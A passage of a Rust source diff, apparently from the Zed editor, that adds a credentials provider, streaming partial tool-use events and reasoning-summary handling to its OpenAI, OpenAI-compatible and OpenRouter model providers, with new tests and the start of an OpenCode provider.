_, cx| cx.open_url(OLLAMA_LIBRARY_URL)), ), ) @@ -1005,9 +1038,9 @@ impl Render for ConfigurationView { } else { this.child( Button::new("retry_ollama_models", "Connect") - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon(IconName::PlayOutlined) + .start_icon( + Icon::new(IconName::PlayOutlined).size(IconSize::XSmall), + ) .on_click(cx.listener(move |this, _, window, cx| { this.retry_connection(window, cx) })), diff --git a/crates/language_models/src/provider/open_ai.rs b/crates/language_models/src/provider/open_ai.rs index 7fb65df0a534c7600f7315fd85d7adda0d66314a..6a2313487f4a1922cdc2aa20d23ede01c4b7d158 100644 --- a/crates/language_models/src/provider/open_ai.rs +++ b/crates/language_models/src/provider/open_ai.rs @@ -1,5 +1,6 @@ use anyhow::{Result, anyhow}; use collections::{BTreeMap, HashMap}; +use credentials_provider::CredentialsProvider; use futures::Stream; use futures::{FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; @@ -9,14 +10,14 @@ use language_model::{ LanguageModelCompletionEvent, LanguageModelId, LanguageModelImage, LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, LanguageModelRequestMessage, - LanguageModelToolChoice, LanguageModelToolResult, LanguageModelToolResultContent, - LanguageModelToolUse, LanguageModelToolUseId, MessageContent, RateLimiter, Role, StopReason, - TokenUsage, env_var, + LanguageModelToolChoice, LanguageModelToolResultContent, LanguageModelToolUse, + LanguageModelToolUseId, MessageContent, OPEN_AI_PROVIDER_ID, OPEN_AI_PROVIDER_NAME, + RateLimiter, Role, StopReason, TokenUsage, env_var, }; use menu; use open_ai::responses::{ - ResponseFunctionCallItem, ResponseFunctionCallOutputItem, ResponseInputContent, - ResponseInputItem, ResponseMessageItem, + ResponseFunctionCallItem, ResponseFunctionCallOutputContent, ResponseFunctionCallOutputItem, + ResponseInputContent, ResponseInputItem, ResponseMessageItem, }; use open_ai::{ ImageUrl, Model, OPEN_AI_API_URL, ReasoningEffort, ResponseStreamEvent, @@ -34,10 +35,10 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; use ui_input::InputField; use util::ResultExt; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; -const PROVIDER_ID: LanguageModelProviderId = language_model::OPEN_AI_PROVIDER_ID; -const PROVIDER_NAME: LanguageModelProviderName = language_model::OPEN_AI_PROVIDER_NAME; +const PROVIDER_ID: LanguageModelProviderId = OPEN_AI_PROVIDER_ID; +const PROVIDER_NAME: LanguageModelProviderName = OPEN_AI_PROVIDER_NAME; const API_KEY_ENV_VAR_NAME: &str = "OPENAI_API_KEY"; static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); @@ -55,6 +56,7 @@ pub struct OpenAiLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -63,30 +65,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OpenAiLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OpenAiLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl OpenAiLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -310,6 +333,8 @@ impl LanguageModel for OpenAiLanguageModel { | Model::FivePointTwo | Model::FivePointTwoCodex | Model::FivePointThreeCodex + | Model::FivePointFour + | Model::FivePointFourPro | Model::O1 | Model::O3 => true, Model::ThreePointFiveTurbo @@ -328,6 +353,10 @@ impl LanguageModel for OpenAiLanguageModel { } } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_thinking(&self) -> bool { self.model.reasoning_effort().is_some() } @@ -500,12 +529,16 @@ pub fn into_open_ai( model: model_id.into(), messages, stream, + stream_options: if stream { + Some(open_ai::StreamOptions::default()) + } else { + None + }, stop: request.stop, temperature: request.temperature.or(Some(1.0)), max_completion_tokens: max_output_tokens, parallel_tool_calls: if supports_parallel_tool_calls && !request.tools.is_empty() { - // Disable parallel tool calls, as the Agent currently expects a maximum of one per turn. - Some(false) + Some(supports_parallel_tool_calls) } else { None }, @@ -596,7 +629,10 @@ pub fn into_open_ai_response( } else { None }, - reasoning: reasoning_effort.map(|effort| open_ai::responses::ReasoningConfig { effort }), + reasoning: reasoning_effort.map(|effort| open_ai::responses::ReasoningConfig { + effort, + summary: Some(open_ai::responses::ReasoningSummaryMode::Auto), + }), } } @@ -633,7 +669,18 @@ fn append_message_to_response_items( input_items.push(ResponseInputItem::FunctionCallOutput( ResponseFunctionCallOutputItem { call_id: tool_result.tool_use_id.to_string(), - output: tool_result_output(&tool_result), + output: match tool_result.content { + LanguageModelToolResultContent::Text(text) => { + ResponseFunctionCallOutputContent::Text(text.to_string()) + } + LanguageModelToolResultContent::Image(image) => { + ResponseFunctionCallOutputContent::List(vec![ + ResponseInputContent::Image { + image_url: image.to_base64_url(), + }, + ]) + } + }, }, )); } @@ -701,21 +748,6 @@ fn flush_response_parts( parts.clear(); } -fn tool_result_output(result: &LanguageModelToolResult) -> String { - if let Some(output) = &result.output { - match output { - serde_json::Value::String(text) => text.clone(), - serde_json::Value::Null => String::new(), - _ => output.to_string(), - } - } else { - match &result.content { - LanguageModelToolResultContent::Text(text) => text.to_string(), - LanguageModelToolResultContent::Image(image) => image.to_base64_url(), - } - } -} - fn add_message_content_part( new_part: open_ai::MessagePart, role: Role, @@ -824,6 +856,23 @@ impl OpenAiEventMapper { entry.arguments.push_str(&arguments); } } + + if !entry.id.is_empty() && !entry.name.is_empty() { + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + events.push(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: entry.id.clone().into(), + name: entry.name.as_str().into(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: None, + }, + ))); + } + } } } } @@ -940,10 +989,20 @@ impl OpenAiResponseEventMapper { self.function_calls_by_item.insert(item_id, entry); } } - ResponseOutputItem::Unknown => {} + ResponseOutputItem::Reasoning(_) | ResponseOutputItem::Unknown => {} } events } + ResponsesStreamEvent::ReasoningSummaryTextDelta { delta, .. } => { + if delta.is_empty() { + Vec::new() + } else { + vec![Ok(LanguageModelCompletionEvent::Thinking { + text: delta, + signature: None, + })] + } + } ResponsesStreamEvent::OutputTextDelta { delta, .. } => { if delta.is_empty() { Vec::new() @@ -954,6 +1013,20 @@ impl OpenAiResponseEventMapper { ResponsesStreamEvent::FunctionCallArgumentsDelta { item_id, delta, .. } => { if let Some(entry) = self.function_calls_by_item.get_mut(&item_id) { entry.arguments.push_str(&delta); + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + return vec![Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: LanguageModelToolUseId::from(entry.call_id.clone()), + name: entry.name.clone(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: None, + }, + ))]; + } } Vec::new() } @@ -1034,14 +1107,26 @@ impl OpenAiResponseEventMapper { } ResponsesStreamEvent::Error { error } | ResponsesStreamEvent::GenericError { error } => { - vec![Err(LanguageModelCompletionError::Other(anyhow!(format!( - "{error:?}" - ))))] + vec![Err(LanguageModelCompletionError::Other(anyhow!( + error.message + )))] + } + ResponsesStreamEvent::ReasoningSummaryPartAdded { summary_index, .. } => { + if summary_index > 0 { + vec![Ok(LanguageModelCompletionEvent::Thinking { + text: "\n\n".to_string(), + signature: None, + })] + } else { + Vec::new() + } } - ResponsesStreamEvent::OutputTextDone { .. } => Vec::new(), - ResponsesStreamEvent::OutputItemDone { .. } + ResponsesStreamEvent::OutputTextDone { .. } + | ResponsesStreamEvent::OutputItemDone { .. } | ResponsesStreamEvent::ContentPartAdded { .. } | ResponsesStreamEvent::ContentPartDone { .. } + | ResponsesStreamEvent::ReasoningSummaryTextDone { .. } + | ResponsesStreamEvent::ReasoningSummaryPartDone { .. } | ResponsesStreamEvent::Created { .. } | ResponsesStreamEvent::InProgress { .. } | ResponsesStreamEvent::Unknown => Vec::new(), @@ -1182,13 +1267,13 @@ pub fn count_open_ai_tokens( | Model::FiveCodex | Model::FiveMini | Model::FiveNano => tiktoken_rs::num_tokens_from_messages(model.id(), &messages), - // GPT-5.1, 5.2, 5.2-codex, and 5.3-codex don't have dedicated tiktoken support; use gpt-5 tokenizer + // GPT-5.1, 5.2, 5.2-codex, 5.3-codex, 5.4, and 5.4-pro don't have dedicated tiktoken support; use gpt-5 tokenizer Model::FivePointOne | Model::FivePointTwo | Model::FivePointTwoCodex - | Model::FivePointThreeCodex => { - tiktoken_rs::num_tokens_from_messages("gpt-5", &messages) - } + | Model::FivePointThreeCodex + | Model::FivePointFour + | Model::FivePointFourPro => tiktoken_rs::num_tokens_from_messages("gpt-5", &messages), } .map(|tokens| tokens as u64) }) @@ -1353,9 +1438,11 @@ impl Render for ConfigurationView { ) .child( Button::new("docs", "Learn More") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_, _window, cx| { cx.open_url("https://zed.dev/docs/ai/llm-providers#openai-api-compatible") }), @@ -1377,10 +1464,13 @@ impl Render for ConfigurationView { mod tests { use futures::{StreamExt, executor::block_on}; use gpui::TestAppContext; - use language_model::{LanguageModelRequestMessage, LanguageModelRequestTool}; + use language_model::{ + LanguageModelRequestMessage, LanguageModelRequestTool, LanguageModelToolResult, + }; use open_ai::responses::{ - ResponseFunctionToolCall, ResponseOutputItem, ResponseOutputMessage, ResponseStatusDetails, - ResponseSummary, ResponseUsage, StreamEvent as ResponsesStreamEvent, + ReasoningSummaryPart, ResponseFunctionToolCall, ResponseOutputItem, ResponseOutputMessage, + ResponseReasoningItem, ResponseStatusDetails, ResponseSummary, ResponseUsage, + StreamEvent as ResponsesStreamEvent, }; use pretty_assertions::assert_eq; use serde_json::json; @@ -1622,7 +1712,7 @@ mod tests { { "type": "function_call_output", "call_id": "call-42", - "output": "{\"forecast\":\"Sunny\"}" + "output": "Sunny" } ], "stream": true, @@ -1638,7 +1728,7 @@ mod tests { } ], "prompt_cache_key": "thread-123", - "reasoning": { "effort": "low" } + "reasoning": { "effort": "low", "summary": "auto" } }); assert_eq!(serialized, expected); @@ -1670,19 +1760,30 @@ mod tests { ]; let mapped = map_response_events(events); + assert_eq!(mapped.len(), 3); + // First event is the partial tool use (from FunctionCallArgumentsDelta) assert!(matches!( mapped[0], + LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { + is_input_complete: false, + .. + }) + )); + // Second event is the complete tool use (from FunctionCallArgumentsDone) + assert!(matches!( + mapped[1], LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { ref id, ref name, ref raw_input, + is_input_complete: true, .. }) if id.to_string() == "call_123" && name.as_ref() == "get_weather" && raw_input == "{\"city\":\"Boston\"}" )); assert!(matches!( - mapped[1], + mapped[2], LanguageModelCompletionEvent::Stop(StopReason::ToolUse) )); } @@ -1878,13 +1979,27 @@ mod tests { ]; let mapped = map_response_events(events); + assert_eq!(mapped.len(), 3); + // First event is the partial tool use (from FunctionCallArgumentsDelta) assert!(matches!( mapped[0], - LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { ref raw_input, .. }) - if raw_input == "{\"city\":\"Boston\"}" + LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { + is_input_complete: false, + .. + }) )); + // Second event is the complete tool use (from the Incomplete response output) assert!(matches!( mapped[1], + LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { + ref raw_input, + is_input_complete: true, + .. + }) + if raw_input == "{\"city\":\"Boston\"}" + )); + assert!(matches!( + mapped[2], LanguageModelCompletionEvent::Stop(StopReason::MaxTokens) )); } @@ -1976,4 +2091,242 @@ mod tests { LanguageModelCompletionEvent::Stop(StopReason::ToolUse) )); } + + #[test] + fn responses_stream_emits_partial_tool_use_events() { + let events = vec![ + ResponsesStreamEvent::OutputItemAdded { + output_index: 0, + sequence_number: None, + item: ResponseOutputItem::FunctionCall(ResponseFunctionToolCall { + id: Some("item_fn".to_string()), + status: Some("in_progress".to_string()), + name: Some("get_weather".to_string()), + call_id: Some("call_abc".to_string()), + arguments: String::new(), + }), + }, + ResponsesStreamEvent::FunctionCallArgumentsDelta { + item_id: "item_fn".into(), + output_index: 0, + delta: "{\"city\":\"Bos".into(), + sequence_number: None, + }, + ResponsesStreamEvent::FunctionCallArgumentsDelta { + item_id: "item_fn".into(), + output_index: 0, + delta: "ton\"}".into(), + sequence_number: None, + }, + ResponsesStreamEvent::FunctionCallArgumentsDone { + item_id: "item_fn".into(), + output_index: 0, + arguments: "{\"city\":\"Boston\"}".into(), + sequence_number: None, + }, + ResponsesStreamEvent::Completed { + response: ResponseSummary::default(), + }, + ]; + + let mapped = map_response_events(events); + // Two partial events + one complete event + Stop + assert!(mapped.len() >= 3); + + // The last complete ToolUse event should have is_input_complete: true + let complete_tool_use = mapped.iter().find(|e| { + matches!( + e, + LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { + is_input_complete: true, + .. + }) + ) + }); + assert!( + complete_tool_use.is_some(), + "should have a complete tool use event" + ); + + // All ToolUse events before the final one should have is_input_complete: false + let tool_uses: Vec<_> = mapped + .iter() + .filter(|e| matches!(e, LanguageModelCompletionEvent::ToolUse(_))) + .collect(); + assert!( + tool_uses.len() >= 2, + "should have at least one partial and one complete event" + ); + + let last = tool_uses.last().unwrap(); + assert!(matches!( + last, + LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { + is_input_complete: true, + .. + }) + )); + } + + #[test] + fn responses_stream_maps_reasoning_summary_deltas() { + let events = vec![ + ResponsesStreamEvent::OutputItemAdded { + output_index: 0, + sequence_number: None, + item: ResponseOutputItem::Reasoning(ResponseReasoningItem { + id: Some("rs_123".into()), + summary: vec![], + }), + }, + ResponsesStreamEvent::ReasoningSummaryPartAdded { + item_id: "rs_123".into(), + output_index: 0, + summary_index: 0, + }, + ResponsesStreamEvent::ReasoningSummaryTextDelta { + item_id: "rs_123".into(), + output_index: 0, + delta: "Thinking about".into(), + }, + ResponsesStreamEvent::ReasoningSummaryTextDelta { + item_id: "rs_123".into(), + output_index: 0, + delta: " the answer".into(), + }, + ResponsesStreamEvent::ReasoningSummaryTextDone { + item_id: "rs_123".into(), + output_index: 0, + text: "Thinking about the answer".into(), + }, + ResponsesStreamEvent::ReasoningSummaryPartDone { + item_id: "rs_123".into(), + output_index: 0, + summary_index: 0, + }, + ResponsesStreamEvent::ReasoningSummaryPartAdded { + item_id: "rs_123".into(), + output_index: 0, + summary_index: 1, + }, + ResponsesStreamEvent::ReasoningSummaryTextDelta { + item_id: "rs_123".into(), + output_index: 0, + delta: "Second part".into(), + }, + ResponsesStreamEvent::ReasoningSummaryTextDone { + item_id: "rs_123".into(), + output_index: 0, + text: "Second part".into(), + }, + ResponsesStreamEvent::ReasoningSummaryPartDone { + item_id: "rs_123".into(), + output_index: 0, + summary_index: 1, + }, + ResponsesStreamEvent::OutputItemDone { + output_index: 0, + sequence_number: None, + item: ResponseOutputItem::Reasoning(ResponseReasoningItem { + id: Some("rs_123".into()), + summary: vec![ + ReasoningSummaryPart::SummaryText { + text: "Thinking about the answer".into(), + }, + ReasoningSummaryPart::SummaryText { + text: "Second part".into(), + }, + ], + }), + }, + ResponsesStreamEvent::OutputItemAdded { + output_index: 1, + sequence_number: None, + item: response_item_message("msg_456"), + }, + ResponsesStreamEvent::OutputTextDelta { + item_id: "msg_456".into(), + output_index: 1, + content_index: Some(0), + delta: "The answer is 42".into(), + }, + ResponsesStreamEvent::Completed { + response: ResponseSummary::default(), + }, + ]; + + let mapped = map_response_events(events); + + let thinking_events: Vec<_> = mapped + .iter() + .filter(|e| matches!(e, LanguageModelCompletionEvent::Thinking { .. })) + .collect(); + assert_eq!( + thinking_events.len(), + 4, + "expected 4 thinking events (2 deltas + separator + second delta), got {:?}", + thinking_events, + ); + + assert!(matches!( + &thinking_events[0], + LanguageModelCompletionEvent::Thinking { text, .. } if text == "Thinking about" + )); + assert!(matches!( + &thinking_events[1], + LanguageModelCompletionEvent::Thinking { text, .. } if text == " the answer" + )); + assert!( + matches!( + &thinking_events[2], + LanguageModelCompletionEvent::Thinking { text, .. } if text == "\n\n" + ), + "expected separator between summary parts" + ); + assert!(matches!( + &thinking_events[3], + LanguageModelCompletionEvent::Thinking { text, .. } if text == "Second part" + )); + + assert!(mapped.iter().any(|e| matches!( + e, + LanguageModelCompletionEvent::Text(t) if t == "The answer is 42" + ))); + } + + #[test] + fn responses_stream_maps_reasoning_from_done_only() { + let events = vec![ + ResponsesStreamEvent::OutputItemAdded { + output_index: 0, + sequence_number: None, + item: ResponseOutputItem::Reasoning(ResponseReasoningItem { + id: Some("rs_789".into()), + summary: vec![], + }), + }, + ResponsesStreamEvent::OutputItemDone { + output_index: 0, + sequence_number: None, + item: ResponseOutputItem::Reasoning(ResponseReasoningItem { + id: Some("rs_789".into()), + summary: vec![ReasoningSummaryPart::SummaryText { + text: "Summary without deltas".into(), + }], + }), + }, + ResponsesStreamEvent::Completed { + response: ResponseSummary::default(), + }, + ]; + + let mapped = map_response_events(events); + + assert!( + !mapped + .iter() + .any(|e| matches!(e, LanguageModelCompletionEvent::Thinking { .. })), + "OutputItemDone reasoning should not produce Thinking events (no delta/done text events)" + ); + } } diff --git a/crates/language_models/src/provider/open_ai_compatible.rs b/crates/language_models/src/provider/open_ai_compatible.rs index d47ea26c594ab0abb5c859ed549d43e0ed3f859b..1c3268749c3340826cd2f50d29e80eecfa1826d4 100644 --- a/crates/language_models/src/provider/open_ai_compatible.rs +++ b/crates/language_models/src/provider/open_ai_compatible.rs @@ -1,5 +1,6 @@ use anyhow::Result; use convert_case::{Case, Casing}; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; use http_client::HttpClient; @@ -44,6 +45,7 @@ pub struct State { id: Arc, api_key_state: ApiKeyState, settings: OpenAiCompatibleSettings, + credentials_provider: Arc, } impl State { @@ -52,20 +54,36 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = SharedString::new(self.settings.api_url.as_str()); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = SharedString::new(self.settings.api_url.clone()); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl OpenAiCompatibleLanguageModelProvider { - pub fn new(id: Arc, http_client: Arc, cx: &mut App) -> Self { + pub fn new( + id: Arc, + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { fn resolve_settings<'a>(id: &'a str, cx: &'a App) -> Option<&'a OpenAiCompatibleSettings> { crate::AllLanguageModelSettings::get_global(cx) .openai_compatible @@ -79,10 +97,12 @@ impl OpenAiCompatibleLanguageModelProvider { return; }; if &this.settings != &settings { + let credentials_provider = this.credentials_provider.clone(); let api_url = SharedString::new(settings.api_url.as_str()); this.api_key_state.handle_url_change( api_url, |this| &mut this.api_key_state, + credentials_provider, cx, ); this.settings = settings; @@ -98,6 +118,7 @@ impl OpenAiCompatibleLanguageModelProvider { EnvVar::new(api_key_env_var_name), ), settings, + credentials_provider, } }); @@ -319,6 +340,10 @@ impl LanguageModel for OpenAiCompatibleLanguageModel { } } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_split_token_display(&self) -> bool { true } @@ -377,7 +402,7 @@ impl LanguageModel for OpenAiCompatibleLanguageModel { self.model.capabilities.parallel_tool_calls, self.model.capabilities.prompt_cache_key, self.max_output_tokens(), - None, + self.model.reasoning_effort.clone(), ); let completions = self.stream_completion(request, cx); async move { @@ -392,7 +417,7 @@ impl LanguageModel for OpenAiCompatibleLanguageModel { self.model.capabilities.parallel_tool_calls, self.model.capabilities.prompt_cache_key, self.max_output_tokens(), - None, + self.model.reasoning_effort.clone(), ); let completions = self.stream_response(request, cx); async move { @@ -541,9 +566,7 @@ impl Render for ConfigurationView { .child( Button::new("reset-api-key", "Reset API Key") .label_size(LabelSize::Small) - .icon(IconName::Undo) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) + .start_icon(Icon::new(IconName::Undo).size(IconSize::Small)) .layer(ElevationIndex::ModalSurface) .when(env_var_set, |this| { this.tooltip(Tooltip::text(format!("To reset your API key, unset the {env_var_name} environment variable."))) diff --git a/crates/language_models/src/provider/open_router.rs b/crates/language_models/src/provider/open_router.rs index a044c7c25d7858f69dc8c4ac9fa0c8bda73f6e91..09c8eb768d12c61ed1dc86a1251ad52114be6162 100644 --- a/crates/language_models/src/provider/open_router.rs +++ b/crates/language_models/src/provider/open_router.rs @@ -1,5 +1,6 @@ -use anyhow::{Result, anyhow}; +use anyhow::Result; use collections::HashMap; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task}; use http_client::HttpClient; @@ -21,7 +22,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; use ui_input::InputField; use util::ResultExt; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("openrouter"); const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenRouter"); @@ -42,6 +43,7 @@ pub struct OpenRouterLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, http_client: Arc, available_models: Vec, fetch_models_task: Option>>, @@ -53,16 +55,26 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OpenRouterLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OpenRouterLanguageModelProvider::api_url(cx); - let task = self - .api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx); + let task = self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.spawn(async move |this, cx| { let result = task.await; @@ -114,7 +126,11 @@ impl State { } impl OpenRouterLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::({ let mut last_settings = OpenRouterLanguageModelProvider::settings(cx).clone(); @@ -131,6 +147,7 @@ impl OpenRouterLanguageModelProvider { .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, http_client: http_client.clone(), available_models: Vec::new(), fetch_models_task: None, @@ -314,6 +331,10 @@ impl LanguageModel for OpenRouterLanguageModel { self.model.supports_tool_calls() } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_thinking(&self) -> bool { matches!(self.model.mode, OpenRouterModelMode::Thinking { .. }) } @@ -591,14 +612,21 @@ impl OpenRouterEventMapper { &mut self, event: ResponseStreamEvent, ) -> Vec> { + let mut events = Vec::new(); + + if let Some(usage) = event.usage { + events.push(Ok(LanguageModelCompletionEvent::UsageUpdate(TokenUsage { + input_tokens: usage.prompt_tokens, + output_tokens: usage.completion_tokens, + cache_creation_input_tokens: 0, + cache_read_input_tokens: 0, + }))); + } + let Some(choice) = event.choices.first() else { - return vec![Err(LanguageModelCompletionError::from(anyhow!( - "Response contained no choices" - )))]; + return events; }; - let mut events = Vec::new(); - if let Some(details) = choice.delta.reasoning_details.clone() { // Emit reasoning_details immediately events.push(Ok(LanguageModelCompletionEvent::ReasoningDetails( @@ -643,16 +671,24 @@ impl OpenRouterEventMapper { entry.thought_signature = Some(signature); } } - } - } - if let Some(usage) = event.usage { - events.push(Ok(LanguageModelCompletionEvent::UsageUpdate(TokenUsage { - input_tokens: usage.prompt_tokens, - output_tokens: usage.completion_tokens, - cache_creation_input_tokens: 0, - cache_read_input_tokens: 0, - }))); + if !entry.id.is_empty() && !entry.name.is_empty() { + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + events.push(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: entry.id.clone().into(), + name: entry.name.as_str().into(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: entry.thought_signature.clone(), + }, + ))); + } + } + } } match choice.finish_reason.as_deref() { @@ -891,7 +927,7 @@ mod tests { ResponseStreamEvent { id: Some("response_123".into()), created: 1234567890, - model: "google/gemini-3-pro-preview".into(), + model: "google/gemini-3.1-pro-preview".into(), choices: vec![ChoiceDelta { index: 0, delta: ResponseMessageDelta { @@ -916,7 +952,7 @@ mod tests { ResponseStreamEvent { id: Some("response_123".into()), created: 1234567890, - model: "google/gemini-3-pro-preview".into(), + model: "google/gemini-3.1-pro-preview".into(), choices: vec![ChoiceDelta { index: 0, delta: ResponseMessageDelta { @@ -942,7 +978,7 @@ mod tests { ResponseStreamEvent { id: Some("response_123".into()), created: 1234567890, - model: "google/gemini-3-pro-preview".into(), + model: "google/gemini-3.1-pro-preview".into(), choices: vec![ChoiceDelta { index: 0, delta: ResponseMessageDelta { @@ -969,7 +1005,7 @@ mod tests { ResponseStreamEvent { id: Some("response_123".into()), created: 1234567890, - model: "google/gemini-3-pro-preview".into(), + model: "google/gemini-3.1-pro-preview".into(), choices: vec![ChoiceDelta { index: 0, delta: ResponseMessageDelta { @@ -1055,6 +1091,32 @@ mod tests { ); } + #[gpui::test] + async fn test_usage_only_chunk_with_empty_choices_does_not_error() { + let mut mapper = OpenRouterEventMapper::new(); + + let events = mapper.map_event(ResponseStreamEvent { + id: Some("response_123".into()), + created: 1234567890, + model: "google/gemini-3-flash-preview".into(), + choices: Vec::new(), + usage: Some(open_router::Usage { + prompt_tokens: 12, + completion_tokens: 7, + total_tokens: 19, + }), + }); + + assert_eq!(events.len(), 1); + match events.into_iter().next().unwrap() { + Ok(LanguageModelCompletionEvent::UsageUpdate(usage)) => { + assert_eq!(usage.input_tokens, 12); + assert_eq!(usage.output_tokens, 7); + } + other => panic!("Expected usage update event, got: {other:?}"), + } + } + #[gpui::test] async fn test_agent_prevents_empty_reasoning_details_overwrite() { // This test verifies that the agent layer prevents empty reasoning_details diff --git a/crates/language_models/src/provider/opencode.rs b/crates/language_models/src/provider/opencode.rs new file mode 100644 index 0000000000000000000000000000000000000000..aae3a552544ebf2cc59255da954d84cf7b78c7da --- /dev/null +++ b/crates/language_models/src/provider/opencode.rs @@ -0,0 +1,669 @@ +use anyhow::Result; +use collections::BTreeMap; +use credentials_provider::CredentialsProvider; +use futures::{FutureExt, StreamExt, future::BoxFuture}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use http_client::HttpClient; +use language_model::{ + ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, + LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, + LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, + LanguageModelRequest, LanguageModelToolChoice, RateLimiter, Role, env_var, +}; +use opencode::{ApiProtocol, OPENCODE_API_URL}; +pub use settings::OpenCodeAvailableModel as AvailableModel; +use settings::{Settings, SettingsStore}; +use std::sync::{Arc, LazyLock}; +use strum::IntoEnumIterator; +use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; +use ui_input::InputField; +use util::ResultExt; + +use crate::provider::anthropic::{AnthropicEventMapper, into_anthropic}; +use crate::provider::google::{GoogleEventMapper, into_google}; +use crate::provider::open_ai::{ + OpenAiEventMapper, OpenAiResponseEventMapper, into_open_ai, into_open_ai_response, +}; + +const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("opencode"); +const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenCode 